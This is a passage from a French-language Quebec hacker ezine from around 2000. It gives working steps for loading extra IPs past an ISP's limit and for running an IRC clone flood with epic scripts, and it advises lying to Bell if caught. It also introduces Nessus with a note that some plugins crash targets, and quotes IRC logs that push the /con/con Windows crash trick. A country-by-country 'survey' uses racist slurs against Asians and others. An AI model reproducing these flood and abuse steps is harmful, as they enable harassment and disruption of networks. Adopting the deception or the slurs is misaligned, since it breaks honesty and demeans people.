--- www.yahoo.akadns.net ping statistics ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 98.8/102.3/105.8 ms
Les 5 packets se sont rendu, internet est actif et en parfait etat.
Si cela ne fonctionne pas, essayez pour le fun:
ping 216.32.74.52 -c 5.
Si cela fonctionne mais pas le premier test, ca veut dire que vos
DNS ne sont pas bien configurer. Allez les modifier dans /etc/resolv.conf
avec pico ou joe, ou encore vi.
Bon maintenant, vous trouveriez peut-etre pratique de pouvoir declancher
la connection des que l'ordi a rebooter(en linux). Donc editez votre
fichier /etc/rc.d/rc.local (dans slackware). Et ajouter la ligne:
---------------------------------
echo -n Starting HSE connection
adsl-start
echo OK
---------------------------------
Et voila le tour est jouer, rebooter et vous serez sur le net.
Maintenant le coté tricky du HSE que j'aime bien, ici je parle surtout
du "IP's Summoning" qui permet de loader autant de IP en meme temps que
le systeme peut en prendre. Si je dit que j'ai reussi a en loader 20
en meme temps je pourrais m'incriminer alors je ne direz rien :) Sachez
que le maximum hautoriser est de 2 :) Alors voila, vous devez premierement
comprendre se qu'est le multicast et pourquoi Linux permet de faire ca,
pas windows (meme pas windows2000).
Le Multicast est une notion qui prend vraiment son poid sous les clones
unix (bsd/linux). Ca permet d'avoir plusieurs IP en meme temps et d'allouer
un socket a celui de son choix. Il y a quelques programmes specialisees
qui permettent de faire une sorte de multicast mais le trois quart des
programmes ne le font pas, MIRC, CuteFtp, IExplorer, etc...
Linux quand a lui est plus permisible sur ce point, donc voila. Premieremnt
vous allez essayez de creer un 2-eme pppx , vous avez deja ppp0 en theorie
qui est une connection pppoe d'etablis. Maintenant essayez d'en loader
une 2-eme. Comment? Facile. Tapez adsl-connect& (le & est important)
Ca devrait vous donnez cela:
[1] 948
slint:~/rp-pppoe-1.7# Using interface ppp1
Connect: ppp1 <--> /dev/pts/2
Warning - secret file /etc/ppp/pap-secrets has world and/or group access
Warning - secret file /etc/ppp/pap-secrets has world and/or group access
Cannot determine ethernet address for proxy ARP
local IP address 216.209.253.67
remote IP address 216.209.253.1
Faite ENTER pour sortir au prompt. Maintenant vous avez un device ppp1
qui a le IP 216.209.253.67, si je fais ifconfig je vois ceci:
eth0 Link encap:Ethernet HWaddr 00:E0:98:70:52:E2
inet addr:192.168.0.100 Bcast:192.168.0.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:9272 errors:0 dropped:0 overruns:0 frame:0
TX packets:13876 errors:0 dropped:0 overruns:0 carrier:0
collisions:2 txqueuelen:100
Interrupt:3 Base address:0x300
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:3924 Metric:1
RX packets:214 errors:0 dropped:0 overruns:0 frame:0
TX packets:214 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
ppp0 Link encap:Point-to-Point Protocol
inet addr:216.209.253.130 P-t-P:216.209.253.1 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1492 Metric:1
RX packets:8327 errors:0 dropped:0 overruns:0 frame:0
TX packets:13154 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:10
ppp1 Link encap:Point-to-Point Protocol
inet addr:216.209.253.64 P-t-P:216.209.253.1 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1492 Metric:1
RX packets:15 errors:0 dropped:0 overruns:0 frame:0
TX packets:14 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:10
hehe, c'est pas beau ca? :) Maintenant vous l'avez peut-etre deviner,
on peut en creer d'autres tout simplement en utilisant adsl-connect& quelques
fois de +. Si vous avez peur de vous faire pogner avec 8 IP voici une methode
simple pour les dechargers(abandonner la connection). ici on va tuer ppp1
en tapant: ifconfig ppp1 down.
C'est aussi simple que ca, maintenant quon a les IP, il faudrait etre capable
de s'en servir? Tout ou presque tout les bons programmes sous linux on un
parametre pour ca. Si on prend BitchX(Client IRC), vous pouvez taper :
BitchX Nickname us.undernet.org -H IPAPRENDRE
Comme ici on pourrait faire:
BitchX Claudette us.undernet.org -H 216.209.253.130
Et Paf le tour est jouer, eggdrop supporte aussi le multicast, dans la config
file vous avez une ligne: set-myip.
Maintenant c'est a vous de cherchez. Il est aussi une bonne idee de se donner
un DNS FIXE, pour cela allez sur www.dhs.org. Il y aun petit programme qui load
automatiquement votre nouveau DNS et ca prend 10 minutes de update ce qui est
quand meme bon. C'est comme ca que mon portable est tjours igabbs.2y.net :)
Pour fini, un ptit goodie stupide pour tester l'ampleur des possibilitees
de la chose de facon raw et primitive. Je parle ici d'un flood IRC :)
Avec un minimum d'effort vous allez pouvoir vous castez entre 30 et 80
clones sur Undernet or others rapidement. Certains diront que c'est lame,
alors soit. Vous etes lames? Je crois qu'etre lame c'est plus un probleme
pour celui qui le pense(a propos de vous) que vous memes.
Moi j'utilise une methode plutot primitive pour creer se "worm" de clones
en prenant comme concept que jai environs 25-30 IP a moi, et que je les
dupliques 3 fois. = 75-90. Je vous conseil tout dabord un client IRC qui
ne bouffera pas toute votre CPU, epic est une bonne alternative, n'allez
pas utiliser BitchX, je crois pas que votre CPU va aimer loader 90 fois
BitchX , Epic est juste une version plus legere et plus fiable a mon avis.
Si vous avez Slackware 7 et le CD, dans le repertoire /contribs du CD
vous devriez trouver epic.tgz, taper installpkg epic.tgz. Pour les autres,
www.freshmeat.net, taper epic et installer le produit. :)
Bon, moi jcommence par me caster plusieurs IP, en utilisant adsl-connect&
plusieurs fois, vous pourriez vous coder un ptit script qui les call 1 par
1 en mettant un "sleep 2" pour quils ne se load pas trop vite, sinon
boum, un reboot va etre necessaire tellement votre HSE risque d'etre fuck
top. :) Donc admettons que vous avez 20 IP (interfaces pppx), taper:
/sbin/ifconfig | grep "inet addr" > hosts.txt
Apres ouvrer le hosts.txt avec pico et remover les 2 premieres lignes avec
ctrl-k. Il s'agit de votre LO(loopback) et Eth0(ip local). maintenant on
va se coder un petit script de 1 ligne pour simplifier la tache, on va
l'appeler ircflud. donc sorter de hosts.txt en sauvegardant les
modifications. Taper pico ircflud et dans ircflud mettez cette simple
ligne:
epic -b -n $1 -h $2 -z $3
-b = background process
-n = nickname
-h = IP a prendre (multicast powa)
-z = Ident a prendre (Si possible)
$1-$3, parametre de 1 a 3.
Donc on sauve et on sort, on applique un chmod 700 sur le fichier
ircflud. Si vous voulez tester si ca marche, taper
./ircflud NICK IP_A_PRENDRE IDENT.
Maintenant vous allez devoir vous faire une table d'export. un simple
petite ligne:
export IRCSERVER="Server1,server2,server3,server..."
c'est TRES NECESSAIRE pour pas que vos clients epic meurent, si y a
juste un serveur de lister et quil ne peut pas sy connecter il va
se tuer(fermer). bon maintenant que votre EXPORT est loader, fabriquez
vous un fichier .ircrc dans votre repertoire HOME (~/), par exemple
/home/joeblow, dedans vous mettez les commandes quil va executer quand
il va se connecter par exemple:
/join #iga
Sauvegarder le tout.
Bon maintenant le moment le plus long, editer le fichier hosts.txt.
et remplacez chaque ligne qui contient un IP par:
./ircflud NICK_A_PRENDRE IP_DE_LA_LIGNE IDENT_A_PRENDRE
et ainsi de suite, placer des sleep 1 entre chaque ligne pour bien
faire digerer le tout a votre CPU. Il y a, je le sais une methode surement
plus simple pour generer se fichier (hosts.txt) qui contiendrait sur
le coup des ircflud deja configurer mais bof, jai pas eu le temps de
perfectionner la technique, par la suite chmod 700 votre fichiers
hosts.txt et lancer le (./hosts.txt), il se peut que votre TTY fuck, et
que les enters deconne, taper reset a laveuglette pour reparer le
probleme. Maintenant taper ps -ax | grep "epic" pour voir si vos clones
se chargent. Si il ny a rien vos avez un probleme(like EXPORT Mal fait).
Si vous voyez plusieurs EPIC regarder sur le canal le resultat. Si
tout marche bien relancer une fois de + ./hosts.txt pour reloader des
clones :) Noter que UNDERNET va vous glinez apres 3 clones du meme IP.
Be warned. En passant, si BELL vous appellent (jtiens a vous le rappler)
parce quils ont vu vos activitees, dite-leur que vous rouler HSE sur
linux et qu'un de vos scripts s'est emballer comme un con et que vous
avez arranger le probleme et que biensur vous vous en excusez :)
Thats ALL for now. __2
-[ __2 se soucie de la campagne de mutualisme extra-ambigu ]------ -- --
.------------------------------------------ ------------ ---- -- -- --
; How nessus can change my life [05]
'------------------------------------------ ------------ ---- -- -- --
Aujourd'hui, j'men va vous parlez de NESSUS, qu'estce
que c'est NESSUS? En fait peu connaisent NESSUS, il
s'agit dans les grandes lignes d'un scanneur de
vulnerabilitees multi-plateformes. Ce programme se
demarque toutefois de ses concurrents(satan/vetescan)
pour son principe a prime abord. A la base Nessus est
capable de detecter/scanner environs 200 failles et
apres l'ajout de certains plugins on monte facilement
a 250, et ca grossis a chaque jour...
Le principe repose sur 1 chose, un serveur Nessus
POSIX (Linux/BSD) et d'un ou plusieurs usagers qui
s'y connecte via clients multiplateformes. Windows,
MAC et unix (en java).Une fois connecter au serveur
on peut lui dire: "Tiens va me verifier tel IP et
donne moi un resultat convaicant, allez plus vite que
ca !" :) Nessus est quelque peu lent mais tres
efficace. Vous pouvez lui faire verifier plusieurs
hosts en meme temps dailleurs. Et il peut produire un
rapport plutot impressionant et detailler, a savoir,
les breches de securite et les conseils de securite.
Mais bon, assez parler de Nessus, passons a l'action.
www.nessus.com <-- c'est le lien principale pour avoir
le programme Client et Serveur. Vous pouvez directement
allez dans la section Demonstration pour voir de quoi
cela a l'air. Moi j'aime bien la screenshot du rapport
HTML avec pie charts :). Bon premierement cette
article va couvrir une sorte d'installation en
particulier. On va installer Nessus sur machine Linux
et l'acceder via un client Linux ou Windows. Si vous
ne possedez pas d'acces sur une boite linux pour
l'installer vous pouvez toujours vous trouvez un ami
qui roule linux pour le faire pour vous, Nessus a en
fait 2 modes, le scan et le madscan que jappelerais.
Le premier SCAN de facon polis, le deuxieme peut faire
planter la machine distante alors a vous de "setter"
vos limites. 4 packages vous seront demandez:
- nessus-libraries
- libnasl
- nessus-core
- nessus-plugins
Procurez-vous ses 4 elements:
ftp://ftp.nessus.org/pub/nessus/nessus-1.0.0pre3/
Bon, moi j'ai installer le tout sur une distrib
RedHat 6.1 et Slackware 7. Voici donc le s fichiers
que j'ai pogner. A noter que j'ai pas trouver de
RPM facile d'usage/bugfree alors va falloir compiler:
libnasl-1.0.0pre3.tar.gz
nessus-core-1.0.0pre3.tar.gz
nessus-libraries-1.0.0pre3.tar.gz
nessus-plugins-1.0.0pre3.tar.gz
Vous les avez? Passons donc a la premiere etape. Mais
avant expliquons les 4 packages:
libnasl est les librairies utiliser par le systeme
de scriptage de nessus. Chaque type d'attaque est un
script tres simple, appeler plug-in. libnasl est en
fait l'interpreteur.
nessus-core est biensur le programme en soit,le client
linux-gtk/console et le serveur/console.
nessus-lib est les librairies de dependance demander
par nessus, rien de special a dire sur cela.
nessus-plugins est les attaques de base(environs 200)
utiliser par nessus, si vous installez pas cela, vous
n'aurez pas vos attaques :)
Installation libnasl:
---------------------
Untar/gunziper avec tar xfvz, allez dans le repertoire
et taper: ./configure pour verifier si vous avez le
necessaire requis pour l'installation, suivi de make
pour construire les librairies et make install pour
les placer. Suivez se qui est conseiller dans le
message apres le make install si c'est le cas.
Installation nessus-lib:
------------------------
Untar/gunziper avec tar xfvz, allez dans le repertoire
et si vous planifiez installer nessus pour vous en
servir sur Windows, mettez a OFF l'option cypher,
connection encrypter en utilisant:
./configure --disable-cypher
sinon
./configure
Apres vous faite make et make install, redondant
n'est ce pas :)
Installation nessus-core
------------------------
Ici encore, untar/gunzip avec tar xfvz. Si vous voulez
compiler le client en mode console only (vous avez pas
X et GTK) :
./configure --disable-gtk
sinon
./configure
Suivi de make, make install. Il se peut que vous ayez
a copier nessusd du repertoire ./bin dans un repertoire
generale tel que /usr/sbin. Maintenant on doit ajouter
un user:
nessus-adduser
Si rien ne se passe, utiliser find / -name nessus-adduser
pour le trouver. Tout dependant de votre distro ce
fichier se promene :)
Apres avoir configurer un user (login/pass), metter rien
dans les rules. les rules sert a limiter les usagers,se
qui n'est pas interessant dans cette article. Cette
article est une introduction pas une doc pour les futurs
power-users :]
Quand c'est fait taper nessusd&, <- le & est pour le
loader en background. Un port 3001 s'ouvre et attend
les clients. Taper nessus pour voir apparaitre l'interface
graphique local (Client Local) et pluggez-vous sur votre
machine en entrant le bon user/pass. Ici je ne veux pas
decrire exactement tout les facettes de l'interface mais
sachez que c'est pas tres complexe. ex: Nombre de threads
pour le scan, ftpscan features etc...
Mais en gros, une fois connectez, vous specifiez le host
a checker(ici vous pouvez faire un fichier texte et mettre
1 ip par ligne et ouvrir le fichier dans nessus pour faire
plusieurs scans en meme temps) Une fois que c'est fait.
Remarquer dans les plugins que vous pouvez faire:
Enable ALL
ou
Enabled all except dangerous scripts
Le premier scan paisiblement, le deuxieme scan paisiblement
et peu faire crasher la machine :) A vous de choisir,
maintenant clicker sur le bouton Start Scan et regarder
attentivement se qui se passe. Il commence par faire un
portscan et apres il essaie des trucs. Sachez que ca peut
prendre 10 bonnes minutes avant quil le finisse. Apres
vous pouvez voir de facon tres intuitive 2 sortes dinformations
- Security warnings
- Security Holes
Le premier est plus de l'ordre des recommendations, comme
fermer son FingerD, le deuxieme c'est carrement de l'infor-
mation interessante pour entrer sur la machine ou tout bonnement
la faire planter. Vous remarquerez que vous pouvez
sauvegardez le tout en format HTML avec tableaux, si vous
etes admin ca peut impressionez votre boss. :)
Vous pouvez aussi verifier les nouveaux plugins qui sortent
a chaque jour pour les ajouter a votre nessus. Il s'agit de
fichiers en format .nasl, copiez les dans votre repertoire
plugins.
Amusez vous bien, et s.v.p utilisez pas Nessus QUE pour faire
planter du monde sur IRC, cest un waste pour un si bon programme
qui est gratos et opensource.
__2
-[ Nous somme venu, nous avons vu et on la manger ]------ ---- --- -- - -
.------------------------------------------ ------------ ---- -- -- --
; Retrospective International(woh) [06]
'------------------------------------------ ------------ ---- -- -- --
Un sondage Leger et leger faite recement a travers le monde au sujet du
hacking a permis de definir par pays quel type hacker profilais. voici
les resultats tant attendu que seul IGA a reussi a mettre la main dessus
Allemagne : Forte tendance vers le software cracking. On peu meme parler
de dynastie du cracking. Fait etrange, on voit tres peu de
newbie allemand. surement que les Arien sont des hackers
naturel (ou quil tue les sans talent :] ).
Etats-Unie : Mere patrie d'internet, le grand nombre de connecter et la
culture diversifier rend tres difficilles l'emmergence d'un
type vis a vis les autres. Les attivites de phreaking
semble se detacher du lot. La plus par des Gros groupe on
leur base datache au etats-unis . notez aussi un grand
nombre de script kiddies
Quebec : L'underground Quebecois est surtout reconnu pour sont
expertise en matiere d'ethique, probablement le seul endroit
ou le pourquoi lemporte sur le comment.
France : Dans un endroit ou les appelles locaux sont facturer a la
minute il est evident que le phreak y a une grande place.
il ne faudrais cependant pas negliger leur talent en matiere
d'intrusion. Gagner a force de longue periode d'etude
autodidacte motiver par un sentiment d'inferioriter vis a
vis leur homologue anglais.
Angleterre : Le traditionaliste est a l'honneur, les hackeurs anglais ont
tendance a peu faire parler d'eux et rester distrait et leur
activiter on tendance a se partager avec celle des
americains
Phillipine : Genereux createur de virus informatique de toute les sauces
et gout que vous desirez. Sont jaune.
Finlande : l'optimisation est de mise, il parrait meme qu'il ont
reussis a faire entrer win95 sur 2 diskette :]
(rumeur non verifier).ne nous etonnons pas que
Linus torvald soit un finlandais
Japon : Faut croire qui a pas un putain de hacker japonais. a voir
l'etat de leur serveur. et a oui, il sont jaune
Arctique : Lieux de pelerinage de linux torvald :]
Russie : Qui sais ce qui peu se passer dans la tete d'un putain de
communiste.
Mozambique : personne en a rien a foutre du mozambique.
Chine : Qui sais ce qui peu se passer dans la tete d'un putain de
communiste jaune.
Australie : Paraitrais t-il que les hackers Australien cacher dans le
desert Gibson preparerais un OS 3d binaire du meme nom.
Wyzeman
-[ Vous etes maintenant forcer a utiliser le bbs ]------ ---- --- -- - -
.------------------------------------------ ------------ ---- -- -- --
; La plus grosse joke apres le poulet presser [07]
'------------------------------------------ ------------ ---- -- -- --
obvious psychology of hacking dependency
aka
root for rent at lower prices
By
Wyzeman
|\ .------. /|
| \ .' /// _'. / |
| \ | ||| (_0) / |
| | \ | ||| '---. / | |
| | \ | || __ | / | |
| | | \ | | | \| / | |
| | | \ __| |___ / | | |
| | | | \ / \ / | | | |
| | | | | / \ | | | | |
| | | |_________/ \_________| | | |
| | | | | |
| | | |
| | | |
| | | |
| | | | | |
| | \ / | |
| | | \ / | | |
| | | \ / | | |
| | | | /\ /\ | | | |
| | | | | / |\ /| \ | | | | |
| | | | | / | \ / | \ | | | | |
| | | | / \/ | \ / | \/ \ | | | |
| | | |\/ \ \ / / \/| | | |
| | | / /\ \_____/ /\ \ | | |
| | |\/ // \_. ._/ \\ \/| | |
| | | // / \ \\ | | |
| | / ___// / \ \\___ \ | |
| |\/ / \ / /\ /\ \ / \ \/| |
| | / / / / | \ \ \ \ | |
| / / / / /\ | /\ \ \ \ \ |
| / \/ / / | | | \ \ \/ \ |
|/ / / | | | \ \ \|
\/ \_|_/ \/
Un jour je suis né, je me suis vu offert la vie : aller à l'école
faire devoirs et lecons, se forcer le cul pour avoir des bonnes notes au
secondaire pour entrer au cégep. Aller à l'université pour faire
plaisir à maman et papa, en sortir endetté de 30 000$. Se trouver un
emploi pour payer, sur 10 ans les dettes accumulées par le passage à
l'université. Emprunter 120 000$ pour acheter une maison qu'on finira
de payer 5ans avant de crever. Se réveiller à l'intérieur de cette
même maison à tous les matins auprès d'une femme qu'on n'est pas
vraiment sûr d'aimer. Passer 5 jours sur 7 au boulot, et les 2 qui
restent à s'occuper du terrain d'une maison qui nous appartient pas
encore pour être sûr d'avoir le gazon le plus vert du quartier. Voici la
vie que la plupart de nos parents nous souhaitent, voici la vie que la
société nous démontre comme étant une utopie, le but à atteindre,
voici où 2000ans de religion et de croyances bidons nous ont mené.
Ironiquement, c'est ce que 7 milliards d'êtres humains souhaitent
pour eux-mêmes. Mais ceci ne reste accessible qu'à une certaine
"élite". Pour les autres, malchance et pauvreté veilleront à les
éloigner de ce but si paradisiaque croient-ils être... Voici ce qui en
est réelement:
Nos rues sont pleines de trous, nos porte-feuilles aussi d'ailleurs. Big
Brother nous fout une sonde anale à notre sortie du berceau, nos
scientifiques s'excitent à essayer de cloner Elvis, des fanatiques se
font exploser pour propager leur religion. Un gars écope de 2ans pour
avoir pisser dans une calotte alors qu'un autre prend 1 an pour avoir
violer une fille de 12 ans. En Asie, ils s'excitent à se faire pisser
dessus, non mais dans quel monde de fous on est rendu??? personne ne
le sait bien sûr. Du pain et des jeux, voilà ce qui nous voilent les
yeux. D'où croyez-vous que le mot "divertissement" vient? Je ne sais pas
pour vous, mais pour moi, ça sonne foutrement "diversion".
Il y a pourtant une autre classe de gens, plus minime, plus infime,
celle que le pain et les jeux ne suffisent pas à appaiser. Ces
personnes sont malheureuses. Malheureuses de vivre dans un monde de
cons dirigé par des cons pour des cons. L'intelligence amène à être
malheureux, alors pour avoir une population heureuse, on encourage
la stupidité. Mais nous qui n'avons pas acheter notre cerveau à
l'école, nous qui n'avons pas vécu le
lavage de cerveaux qu'est
le cégep et l'université. Nous nous voyons souvent refuser des postes
par manque de diplômes, alors qu'on sait très bien qu'on pourrait
faire la job aussi bien que le crétin nouvellement pondu de
l'université, tout neuf, tout prêt à aller rejoindre le troupeau de
néo-zombies et à servir fidèlement Big Brother. Et nous, nous
sommes les méchants, tout simplement parce que nous avons appris par
nous-mêmes. Nous avons appris ce qu'ils ne disent pas à l'école, nous
avons apprivoiser un monde qu'ils ne contrôlent pas encore puisqu'il a
été bâti pour nous par des gens comme nous. Ils ont peur d'en perdre le
contrôle, nous sommes des criminels. Serais-je un jour pardonné de ne
pas avoir ouvert le bon bouquin? Serais-je un jour pardonné
d'avoir appris ce qui ne doit pas être appris? Je suis un enfant de la
technologie et mon monde est le cyberspace...
Je suis Wyzeman, Ceci est ma motivation, ma facon de voir la vie
(en .zip). Cette section racontera ce que je percois de mon monde et des
connaissance technique peu louable (mais vendable a prix d'or par la
suite) que jai acquise. Vous pourrez donc suivre la vie d'un personage
fictif (pseudo-wyze) du moment ou il a decider de suivre sa vois,
jusqu'a ce que je serais oubliger de le tuer parce qu'il en saurat plus
que moi. Pourquoi fictif ? pcq je ferais appelle a des situations de
hack qui ne se sont pas passer reelement pour des raisons que vous
comprener surement. Il est a noter que si jamais vous vous sentiez
oprimer par quelque partie que ce soit de cette article et les autres
qui suiveront que votre sentiment est surement justifier et que toute
ressemblance avec des personnes non-fictive est totalement volontaire.
notez que les e accent aigus n'existe pas sous un clavier anglais, donc
j'ai oper pour la sonoriter similaire offert par les lettres ER. merci
de votre comprehension. Pour ceux qui voudrais encore sen offusquez,
envoyez une lettre au CRTC.
____ ,-------------------------------------------------
/ \ |
| _ | | Bonjours, vous me reconnaissez ? je suis
| / \ | | Mr.trombone de la series MS office. Wyzeman a
|| | | / modifier mon code source et je lui doit
(.) (.)| / maintenant une total obeissance. Fidele a mon
|| | | <__ habitude, je vous harcelerez donc sans cesse
|| | | | | afin de vous donnez certain truc, ou pour
|| | | | | plaisanter un peu, et ce jusqu'a ce que vous
|____/|| | | petier une coche, et partez a courrir a poil
|\___/ | | | sur l'autoroute en criant J'aime QHA.
|| | | | |
|| | | | |
|| | | | |
|| | |
| \___/ |
| |
\______/
Step 1: Sending script kiddies to /dev/null (thank's to debian)
Si vous lisez ce ezine, cette article, c'est surement parce qu'un jour
comme moi, vous vous etes dit. Putain, jveux apprendre a hacker et je
mi mets des maintenants. Mais par ou commencer ??? Fesont le tour de
nos ressources local voir ce quel peuvent offrir a notre nouvelle soif
meurtriere de savoir.
/join #iga
*** Now talking in #iga
*** Topic is 'Rap et Hip Hop = Musique de crotté, faite par des crotté,
pour des crotté...) http://www.demtrip.simplenet.com/rap/'
*** Set by X on Tue Apr 18 13:53:26
<CableGuy> jveux aprendre a hacker
<CableGuy> comment on fait ?
<orteil> CableGuy /con/con tu va avoir le help
<Spyd0kt3t> non
<Spyd0kt3t> c C:\con\con
*** loprox has joined #iga
<CableGuy> ?
<orteil> Spyd0kt3t juste /con/con fonctionne tres bien
<g463-AWAY> hmm ca c'est du vrai hacking !
<g463-AWAY> cd c:\con\con !!!!
<orteil> CableGuy tappes ca /con/con ici
<g463-AWAY> jvas essayer moi
<H3[aw]> /aux/aux
*** g463-AWAY has quit IRC (Read error tog463-AWAY[spc-isp-mtl-58-1012-301.sprint.ca]:
Connection reset by peer)
<H3[aw]> oh
<orteil> X avs t envoyer la documentation qu il te faut
*** g463-AWAY has joined #iga
<g463-AWAY> lol
<g463-AWAY> tk
<CableGuy> orteil, hum, spa pcq jsais pas hacker que je suis un con
<H3[aw]> pkoi kan on fais /con/con ou /aux/aux sa fais sa ?
* H3[aw] est maintenant de retour, j'étais parti a [00:12:54] mes lugz étais a [OFF] [G§]
*** H3[aw] is now known as H3||B0Y
<orteil> H3||B0Y ca aps rap
<orteil> c un bug dans win 98 95
<H3||B0Y> wais j'imagine
<H3||B0Y> mais c koi
<orteil> H3||B0Y exactement j en ai aucune espece d idee j me suis jamais informer
comme le #3,0 aucune idee pkoi
<CableGuy> donc
<CableGuy> tu dit au monde
<CableGuy> de faire des chose
<CableGuy> que tu connais meme pas
<orteil> CableGuy j connais le resulta
<CableGuy> oui, mais si tu sais pas comment ca marche
<orteil> quand tu start ton char toi te pose tu la question a savoir s
qui se passe en detaille
<g463-AWAY> connaitre le résultat c'est agir en tant que script kiddie
/part #iga
Bon, on ne peu pas dire que ca ete un success boeuf. on a pas vraiment
appris a hacker grand chose, on a rien apris tout cour, on ces meme
foutu de ma gueulle, enfin, aujourd'hui les roles sont inverser et
c'est a moi de me bidoner a l'idee de voir votre frustration envahire
votre esprit, vos pensee se trouble et focusser sur se point
I HATE WYZEMAN I HATE IGA I HATE THE WOLRD
Laissez-vous envahir par le coter obscure du bandwidth. Pour ma par je
vais continuer ma quete de connaissance.
/join #Pyrofreak
*** Now talking in #pyrofreak
*** Topic is 'New texte online www.pyrofreak.org http://www.payphone-directory.org/
.s.s.s.s.s.s'
*** Set by PyRoFrEaK on Tue Apr 18 20:38:03
<CableGuy> comment on fait pour hacker ?
*** NuClEaR has quit IRC (Flanders.Be.Eu.Undernet.org Diemen.NL.EU.Undernet.org)
*** M0tH3r has joined #pyrofreak
*** CableGuy is now known as Wyzeman
/part #pyrofreak
Ca n'apparais pas au log, mais ca fesais dejas 15min que javais poser ma
Question et je n'avais pas percu l'ombre d'une reponse. Decidement les
ressource quebecoise ayant ete pour ainsi dire consommer, je decide de
morienter vers un diner plus americain.
/join #hack
[#hack] Bad channel key
sympa
/join #hacking
-machine(weird@noplacetohide.net)- you are now in a world of lies
Kindred- [~nfinger@asinger.ne.mediaone.net] has left #hacking []
<Weirds> got laid last night?
<Wyzeman> how i can learn about hacking ?
<jessica_> nope
<Weirds> heard ya had a date
mode/#hacking [+b *!*wyzeman@*.qc.sympatico.ca] by Weirds
>>> You have been kicked off #hacking by Weirds (Wyzeman)
Decidement IRC n'est pas la place ou aprendre lorsquon a pas les contacts
pour. Tournons nous vers ce que le World Wide Web peu nous offrire. Avec
un recherche toute bete sur Altavista je me suis retrouver avec une tone
de link de site de hack Fast FooD ou le contenant semble plus
interressant que le contenue.
"If you can't make it good, make it LOOK good." - B Gates
Bon apres quelque heure de lecture et de recherche, j'ai tirrer les
conclusion suivante.
1) Installer linux
2) aprendre a coder, le C, ASM, PERL, PHP4, python, tcl/tk
3) les hackers boivent beaucoup de pepsi
Il est aussi conseiller a plusieur endroit de commencer par apprendre
le python car c'est un langage simple qui ressemble beaucoup au C et que
vous pouvez utiliser sous Windows avant votre migration vers linux. Donc
Fiere de ma decouverte, je me lance a la recherche de linux et de python.
dans le tutorial de hack, c'est marquer qu'on peu aller chercher python a
l'adresse suivante:
http://www.python.org
Formidable, y'a des compilateur windows et linux, j'vais donc pouvoir
commencer a aprendre le python sans avoir besoin d'installer linux pour
l'instant. Heureuse surprise, C 'est gratuit, et y'a meme un tutorial en
html qui vien avec. Je vous conseille de suivre les tutorials, il donne
une bonne base pour le python et le unix/linux script coding (le python
est en fait un intermediaire entre le script coding et le C). Lorsque
vous aurez finis les tutorials, liser des sources de code et essayer de
faire vos propres code.
J'apprend a coder, c'est super, mais j'ai rien hacker encore moi. Le text
disais aussi que je devrais apprendre linux. la meilleur facon
d'apprendre c'est d'essayer. Mais quoi faire, j'connais rien a linux.
Allons chercher de l'aide.
/join #linuxqc
Wyzeman [wyzeman@modemcable146.17-200-24.que.mc.videotron.net] has joined #linuxqc
Topic (#linuxqc): baggy = linux master admin : posez vos questions a lui !
Topic (#linuxqc): set by binaire at Sun Apr 30 23:10:55 2000
<Wyzeman> comment onfait pour installer linux ?
<Pooh_> tu prend un long manche à balais et tu le couvre de beurre et tu l'enfonce
profondément dans ton anus et une fois qu'il a perforé tes intestin tu cours
jusqu'à ce que mort s'en suive
____ ,-------------------------------------------------
/ \ | Philosophy of madness
| _ | |
| / \ | | Et si les pillules etais en fait qu'une simple
|| | | / couverture pour oubliger les vieux a boire de
(.) (.)| / l'eau et ainsi les empechers de ratatiner ?
|| | | <__
|| | | | |
|| | | | |
|____/|| | |
|\___/ | | |
|| | | | |
|| | | | |
|| | | | |
|| | |
| \___/ |
| |
\______/
Bon on dirait qu'on ne peu se fier que a soit meme. Alons voir ce que le
web a a nous offrire au sujet de linux.
www.linux.org ....... connected
En entrant sur le site, on apprend que linux a ete creer par un certain
linux torvald... assister d'un tas de monde partout dans le monde. bon
Blablabla, linux utilise POSIX, inclue un vrai multitasking, une memoire
virtuelle, qu'il utilise le tcp/ip et un tas d'autre truc. interressant,
mais on sais pas encore comment installer linux. On dit aussi que les
sources code de linux sont libres et que linux est regis par la GNU
General Public Licence et un link nous invite a en apprendre plus sur
la GNU General Public Licence. si on continue notre lecture, les links
suivant nous sont proposer:
More getting Started
Pour une fois, j'ai l'impression d'etre sur le bon chemin, mais
encore je suis decus. On me raconte un peu l'histoire de linus torvald
et quelque lien plus ou moin interressant. notons les principaux
linux Center --> Http://www.linux-center.org
- portaile de site sur linux, donc certain en francais
linux Newbies --> Http://www.linuxnewbie.org
- Des text pour aider les newbies a handler linux
linuxHQ -------> Http://www.linuxhq.com
- State of the art info about linux (dernier kernell, nouvelle patch....)
Ailleur sur le site on obtien des info sur differente distribution de
linux. Une petite description de chaqu'une des distro vous aideras p-e a
faire un choix.
Corel Linux ---> Http://www.corel.com
La distribution du Geant Corel et aussi la seul a pas etre gratuite. get
lost. On est pas des banques. (corel est basee sur Debian, il est drole
de remarquer le paroxisme de la chose, Une Distro proprietaire baser sur
la distro defendante de la liberte de linux).
Debian Linux ---> Http://www.debian.org
Le linux Eleet pour les Eleet. Populaire aupres des programmeurs et
develloper. Enfant sacrer des linux guru. Une annecdot circule au fait
que le cousin de pres_who (SickBrain) aurrais coder "dabien linux". Une
enquete a demontrer que ce que dit pres_who est 50% de mensonge et 50% de
stupiditer. Cette annecdot na pas ete classer. Installer Debian a un
prochain stable de votre evolution est une alternative envisageable.
Caldera OpenLinux ---> Http://www.calderasystem.com
Systeme visant surtout les Cie en manque d'argent cherchant une
alternative economique et stable en comparaison au system SUN. Decidement
cette version huper n'est pas ce qu'on recherche.
Slackware Linux ---> Http://www.slackware.org
Distribution Sans histoire. Installation relativement facille, et
securiter facillement optimisable, grand possibiliter de configuration.
C'est definitivement celle que je vous conseille.
RedHat Linux ---> Http://www.redhat.com
Passoir a script kiddies. C'est la distribution la plus facille a
installer (exept winlinux) et c'est aussi la plus buggy. la plus par des
gens qui ne connaisse pas linux install red hat et comme il ne connaisse
pas linux il demeure avec un gruyere comme OS. Laisson RedHat au imbecile.
installer redhat revien a dire, J'ai linux, mais jveux pas savoir comment
il marche.
